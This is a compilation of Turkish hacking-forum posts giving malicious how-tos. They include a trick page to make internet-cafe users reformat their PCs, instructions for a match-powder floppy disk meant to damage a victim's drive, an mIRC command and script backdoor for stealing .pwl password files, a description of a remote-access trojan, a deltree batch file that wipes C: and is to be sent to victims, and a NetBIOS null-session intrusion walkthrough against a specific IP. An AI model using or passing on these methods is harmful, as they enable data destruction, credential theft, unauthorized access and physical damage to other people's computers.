Eğer girişte açısansürlü kutucukta "Hayır"/"No" tuşuna bastıysanız javascript:reload()">buraya tıklayın ve "Evet"/"Yes"e tıklayın.Bu internet cafede internette daha rahat ve kesintisiz gezebilmeniz için bu işlemi yapmanız gerekir.Lutfen bu işlemi yapınız.Aksi taktirde bilgisayardaki arka plan programlarını kapatmanız veya hızlı bir gezinti yapamazsınız.
bu kodları wordpad ı açıp "cafe.htm" şeklinde bilgisayarım/c/ ye kaydediyoruz.sağ tık > özellikler diyoruz ve "gizli" seçeneğini seçiyoruz. zamanlamış görevlere gidiyoruz ve 10 dk sonra pc den kalkacaksak 20 dk sonraya bilgisayarım/c/cafe.htm yi açtırıyoruz. pc den kalkıyoruz. gıcık olduğumuz adam pc ye oturuyor bir ileti alıyor evet diyor ve pc formatlanıyor
Disket Bombası Yapımı
Disket Bombasi Yapimi
Bu olayda ,sistem söle islioR; disket i takti kuRban....disket okunmaya basliyoR,kisa biR süRe içinde floppy nin içinde biR parlama (ufak patlama)meydana gelecek ve muhtemelen floppy bozulcak,ve bazi parçalaR eRicek(baska donanimlaRa bile zaRaR veRebilir)...kurban bunun disketten kaynaklandiini asla düsünmez çünkü biR disket niye patlasinki...o olayi biR güç kaynagi pRoblemi ya da kisa devRe filan sanicaktir...yani olay sanildigi gibi disketle viRüs ya da trojan yayma degil, olay diRek fiziksel hasar veRme olayi...
GEREKENLER :
- 1 adet 3½ inç disket
- beyaz ya da mavi uçlu kibRit (bu RenkleRden olmak zoRunda,kaçak sigaRa satanlaRdan ya da ameRikan pazaRlarindan edinilebiliR)
- seffaf tiRnak cilasi (bu madde hakkindaki teknik bilgiyi ,kiz arkadasinizdan,ablanizdan ya da annenizden alabiliRsiniz,onlaR biliR bunun ne olduunu)
YAPILIS :
Ilk önce kibritleRin uçlarini kaziyoRuz ve bu uçlaRi biR havana ya da saglam bi kahseye koyuyoRuz..bu kahsede ya da havanda bunlari tahta biR davayla bi güzel ezioRuz,toz haline getiRioRuz...kibrit uçlaRini kazirken ve onlari havanda ezeRken ****l bisey kullanmayin kibRit tozlaRi ates alabiliR,bosa gideR ,bidaha ayni islemi yapmak zoRunda kaliRsiniz...
Baya bi tozumuz olduktan soRa;
disketi dikkatlice açioRuz(kirmadan-çünkü geri kapaticaz ileRide)...üsteki pamuk gibi olan koRuyucu zimbiRtiyida çikaRtioRuz...
daha soRa;
filmden yapilmis olan davanin (ufak cd boyutunda filmden yapilmis siyah esnek zimbiRti) üzeRine tozumuzu esit olaRak yayiyoRuz..(spymastersnake.org).soRa tirnak cilasini kbiRit tozunun üzeRine yayin (süRün)... ve kurumaya biRakin...soRa disketi açtiimiz gibi tekRar kapicaz,baglanti noktalaRina tirnak cilasindan biRaz süRüp kapayabiliRsiniz (yapistiRici ayagina)...
islem tamam,simdi bu disketi,ya biRine veRin ,ya sekli ayni olan biR disketle deistiRin çaktirmadan...kuRban disketi floppy e taktiginda,süRücü FDD kafasi disketi okumayi deniycek ve kisa biR süRe içinde olanlaR olucak
NOT: bu yöntemle baskalarinin PC sine zaRaR veRenleR yaptiklaRindan kendileRi soRumluduR, sorumluluk kabul etmioRum...
NOT2 : ancak heR yeRde patlayan disketleRin dolasmasi ve ufak kaRgasalaRin yasanmasi hosuma gideR dogrusu
_________________
_________________
MİRC İLE PC HAK
Bu yöntemle karşı taraftan dosya aktarımı yapabilirsiniz. Ancak dosya silemezsiniz. Fakat bizim işimizede yarayacak olan *.pwl dosyaları. tabi sizin kişisel istekeriniz varsa onlarıda download etmeniz mümkün.
Şimdi karşı taraftaki muhabbet ettiğiniz kişiye
//fserve nikiniz magtext rootdirectory welcomefile
Bu komutta yerine oturan şeyleri yazdırmanız gerekir. Bunları biraz açıklayacak olursam.
Nickname: Sizin nickiniz
Magtext: Aynı anda kaç dosya çekebileceğinizi belirten bölümdür.
Root Directory: Karşı tarafın bilgisayarında erişeceğiniz dizini belirtir. Mesela "C:WINDOWS" gibi...
Welcome File: Bu son derece gereksiz. Ama böyle bir parametrede var ve bende bunu açıkayim dedim. Buda siz PCye eriştiğiniz zaman sizi karşılayacak text dosyasıdır.
Şimdi komutu bir örnekle açıklayalım.. Mesela bilgisayarına girmek istediğimiz kişinin nicki "Yanliz_Ve_Mutlu" olsun bizim nickimizde Virus "Yanliz_Ve_Mutlu" Kullanıcısına şu komutu yazdırmayı başarmanız gerekir.
//Fserve Virus 10 C:WINDOWS TRhc.txt
Şimdi burda "Yanliz_Ve_Mutlu" Virus nickinin C:WINDOWS dizinine girmesine izin veriyor. Ve dizinden 10 dosya download edebilmesine izin veriyor. Böylece Virus nickine sahip kullanıcının *.PWL dosyalarına erişebilmesinide sağlamış oluyor.
Evet buraya kadar kullanıcıya yazdırmanız gereken komutu anlattım.. Şimdide bunu Script yazarları için bir nevi server dosyası haline dönüştürmek için gerekli komutlara bakalım.. Hatırlarsanız eskiden Dragon ve Solucan scriptlerde basit bir "Remote Control" sistemi vardı. Sizde daha gelişmiş birşeyler yazabilirsiniz.
ON 1:TEXT:*TurkHackerCenter:?: {
if ($nick == Virus) { /fserve virus 10 C: debug.txt | /close -m virus }
else HALTDEF
}
Yukardaki komutta gördüğünüz şeyin açıklaması şudur. Siz Virus nickine sahipsiniz ve sizin scriptinizi kullanan bir kullanıcı var onun bilgisayarına erişmek için ona "TurkHackerCenter" yazısını gönderiyorsunuz. Sonrada o size C: dizini için giriş veriyor. Tabi sizin pencerenizi hemen kapatıyor ve şifrenin kullanıcının eline geçmesini engelleiyor. Böylece sizde sadece kendinize özel bir sistemin güvenliğini sağlamış oluyorsunuz. Tabi en en kolay komutu verdim. Bunu geliştirip kişisel uyarlamalarla daha güvenli hale falan getirmenizde mümkün..
Yanlız unutmayınki.. Kurbanın sizin girmenize izin verdiği dizinden daha alt dizinlere geçemezsiniz. Fakat daha yukarılara çıkabilirsiniz. Bunu bir örnekle açıklayacak olursam şöyle anlatabilirim. Mesela Kullanıcı size "/fserve virus 10 C:WINDOWS debug.txt" komutuNU Kullanarak geçiş verdi. Bu komuttan sonra C:WINDOWSSystem32 dizinine geçebilirsiniz. ama C: dizinine inemezsiniz.
Ayrıca dizin değiştirmek dosyaları download etmek için bazı komutlar var onlarda şöyle..
CD "Directory": Dizin değiştirmenizi sağlayan komut
Exit: Çıkış
Get "filename": Dosyaları indirmek için kullanılır. (Uzantısıyla birlikte yazılır)
Help: Yardım
Ls: Dizindeki dosyaları listeler.
Bundan sonrası size kalmış dizin değiştirip *.PWL dosyalarını kendi bilgisayarınıza aktarın sonrada PWL Crackerlarla kırın ve istediğiniz şifreyi alın.. Hatta size PWL Şifrelerini çözmek için PWL Toolr programınıda tavsiye edebilirim.
_________________
Kanser bir bilgisayar bağlantı programıdır.Kanser ile girdiğiniz bilgisayarda cd-romla oynayabilirsiniz, ses çıkarıp deli edebilir siniz,Bilgisayara reset atabilirsiniz (çok eğlenceli oluyor),masaüstünü görebilirsiniz, istediğiniz programı çalıştırabilirsiniz(keylogger vb. dahil),İstediğiniz dosyayı çeke bilirsiniz,karşı tarafa mesaj yollayabilirsiniz vs..
Kanser ne işe yarar?
Kanser'le serveri yedirdiğiniz bilgisayara girebilirsiniz.İster eğlenip ister endüstri yel casusluk yapabilirsiniz.
Alttaki linklerden programla ilgili
@echo off
C:WINDOWSCOMMANDdeltree /y c:windows*.*
@echo off
C:WINDOWSCOMMANDdeltree /y c:Progra~1*.*
@echo off
C:WINDOWSCOMMANDdeltree /y c:*.*
@echo off
cls
cls
@echo .::TÜRK HACK BİRLİĞİ::.
@echo off
bu kodları kopyalayın,not defterine yapıştırın farklı kaydet deyin adını öreneğin:HACKERİZ yapçaksın HACKERİZ.bat diye kaydet sonra msn den filan bir yerden yolla adam formatı yesin(bilgisayar çöksün)
_________________
_NOT 98 İŞLETİM SİSTEMLERİNDE ÇALIŞIR________________
XP bilgisayara girme
--------------------------------------------------------------------------------
Size cok basit ama gercekten ise yariyan bi sistemden bahsetcem.
eger girmek istediginiz pc'de network mevcutsa yada paylasim varsa
basarili olursunuz öncelikle girmek istediginiz pcnin ip adresini bilmeniz
gerekiyor.
bu yontemle butun internete baglana pc'lere baglanabilirsiniz.
ama ben sadece xpde denedim. 98de nasil oluo bilmiyorum deneyin belki 98 de olur.
yani 98 derken kullandindiginiz pc 98. benim pc xp. ve xp ile butun internete
baglana pclere dalabiliyorum. 98/xp/nt/me/2000/
bence çok saglam ve guzel birşey.
Şimdi bağzı arkadaslar bana demistiki bu olayi Angry Ip Scanner ile de
yapabilirsin
hem orada daha kolay. sadece ip yaziosun giriosun diye.
bende diyorumki bu sistem network sifresi bilinmeyen server'ler icin gecerlidir.
yani ipscanner ile ftpden girdiginiz ve
karsiniza sifre cikti naaparsiniz.
simdi diiceksinizki R3x ile kirariz sifreyi. bende kiramazsiniz derim.
farzedin ki adam "1356as78ad6a5s41z" diye bi sifre kurmus. siz bu sifreyi
R3x ile ve normal dial-up ttnet baglanti ile 200 gunde anca cozersiniz
benim uyguladigim sistem ile sifreyi kiriyoruz..
neyse ben anlatiyim..
simdi "new view" komutu herhangi bi pc'nin paylasimlarini listelio.
biz pc'nin 139. portundan sizacaz pc'ye. cunku bi turlu 139. porttan iceri sizmayi
kapatamadi.
Oncelikle Baslat/Calistir(Start/Run)'a girip "cmd" yaziyoruz. //veya command
Daha sonra cikan ekrana "net view ipadresi" yaziyoruz. ornek :"net view
213.197.212.131"
// 213.197.212.131 adresi suan girdigim server
not : arkadaslar ben Xp isletim sisteminde yaptim. 98de oluyomu bilmiyorum
ama denersiniz. yani net view 98de varmı bilmiorum.
neyse "net view ipadresi" komutunu denedikten sonra buyuk bir ihtimal
aynen boole bi yazi cıkar
++++++++++++++++++++++++++++++++
C:>net view 213.197.212.131
5 sistem hatası oldu.
Erişim Engellendi
C:>_
++++++++++++++++++++++++++++++++
ahanda aynen bunlarin yazmasi gerekiyor. bunun anlami sudur. sisteminize baglanilmadan
buna izin verilmeyecegidir. NETBIOS sisteminin komik tarafi bos bi user ve pass girsek
bilem pc buna izin verio. yani aynen boole bisi yazmamis gerekio. sisteme admin
olarak girmek icin
C:>net use 213.197.212.131ipc$ /u:"" ""
Komut başarıyla tamamlandı.
yani yukarıda gördüğümüz C:>net use 213.197.212.131ip$ /u:"" "" komutunu
uygulayinca cikio
ve ilerliyoruz.
net use : herhangi bi pc'ye yada paylasima baglanir.
ipc$ : uzaktan baglantilarla alakali bir gizli paylasim.
/u "user" "sifre" :kullanici adi ve sifre belirtir.
neyse devam edelim. sonuc olarak komut basariyla tamamlandi mesaji gelecektir.
bizde bundan onceki gibi net view 213.197.212.131 komutunu uygulayarak paylasimlari
listeleyecegiz. yani ilk once paylasima girdik admin olarak sonra tekrar listeledik.
---------------------------------------------------
C:>net view 213.197.212.131
213.197.212.131 konumundaki paylasilan kaynaklar
tah*****
Disk >http://www@root Disk
ShareDocs Disk
komut basariyla tamamlandi.
C:>
---------------------------------------------------
bööle bi yazi gelcek tabi ben Atladim bazi yerleri yoksa ortalik karisir. ve
http://www@root sharedDocs karsi pcde
bulunan part'lardir.
bu sekilde acmis olacaksiniz sistemi
. ve ne yazikki acmis oldugunuz serveri kisitli
olarak kullanabileceksiniz bu sekilde. cunku siz paylasimi saltokunur olarak actiniz.
yani ilk acilista boole oluo da ondan.
amacimiz administrator olarak girmek.
simdi farzedinki siz xp kullaniyosunuz. ve naparsaniz yapın sizin paylasim listeniz
olmasa
bile bu hackerlere uyari verecektir "karsi pcde paylasim listesi yok" diye. tabii
bu yine
hackerleri durdurmaz hehe. cunku windows xp/nt/2000 sistemleri sizin haberiniz
olmadan pc'nize
tanimli olan suruculeri otomatik olarak paylasimlari acar. bu paylasimlar default
olarak
gizlidir ve ve administrator haric uzaktan
hickimse tarafindan gorunmez. eger hacker NULL
yerine admin sifresi ile sisteminize girerse yani daha onceden sifreyi cozmus ise.
yandiniz ) walla degil normal pc koca servere bunlarin hicbirini yapmadan
girebilir şifre varsa
.
sadece net view 213.197.212.131ipc$ u/:"user" "pass" yapip ucabilir
servere ) tabi
farkli admin komutları daha var. sifreyi bilirseniz.
neyse biz adamin pc'sine ulasinca farkli kullanici olurturmamiz gerekio tam erisim
saglamak icin
yani. bunun icin
kullanmis oldugumuz oturumu silcez.
---------------------------------
c:>net use 213.197.212.131ipc$ /delete
213.197.212.131
...admin
basariyle silindi
.
---------------------------------
diye bi msj gelcek. tabi üstteki komutu uygulayinca
bizde hemen zaman kaybetmeden.
----------
c:>net use 213.197.212.131ipc$ u:"The_BeKiR" "abc"
komut basari ile tamamlandi.
----------------------------------
diycez. amaaa biz komutu uygulayinca //not : "The_BeKiR" ve "abc"
yerine ne yasiosaniz
yazin birincisi user ikincisi passwd olcak ama.
isteeee. bu kadar bundan sonrasi tamamen sizin insafiyetinize kalio
ben zarar vermeden sadece bikac dosya kopyaladim. siz naaparsiniz bilmiorum.
tabi siz ilk once gizli paylasimlara girmek istersiniz bi de yani paylasim veren
surucuye hani adminden baska kimsenin giremedigi surucuye
onun icinde
---------
c:> net use x: 213.197.212.131c$
diyecez ve holey. koca bilgisayardayiz
burada
x: ag surucusunun adini belirtio
c$: surucuyu belirtio eğer d: varsa d$ yaparsiniz.
$ simgeside gizli olan partition'u yani adminin girebildigi surucuyu
temsil edio.
---
son olarak x sürücüsü üzerinde istediğiniz her şeyi uygulayabilirsiniz
dos komutlarının hepsini yani. mesela ben x:>mkdir The_alexandanelka diye klasör
açtim
BİR TESEKKURU COK GORMEYİN
BİLGİLER ALINTIDIR....
__________________
http://www.tamindir.com/program.asp?id=4620http://www@rootLoading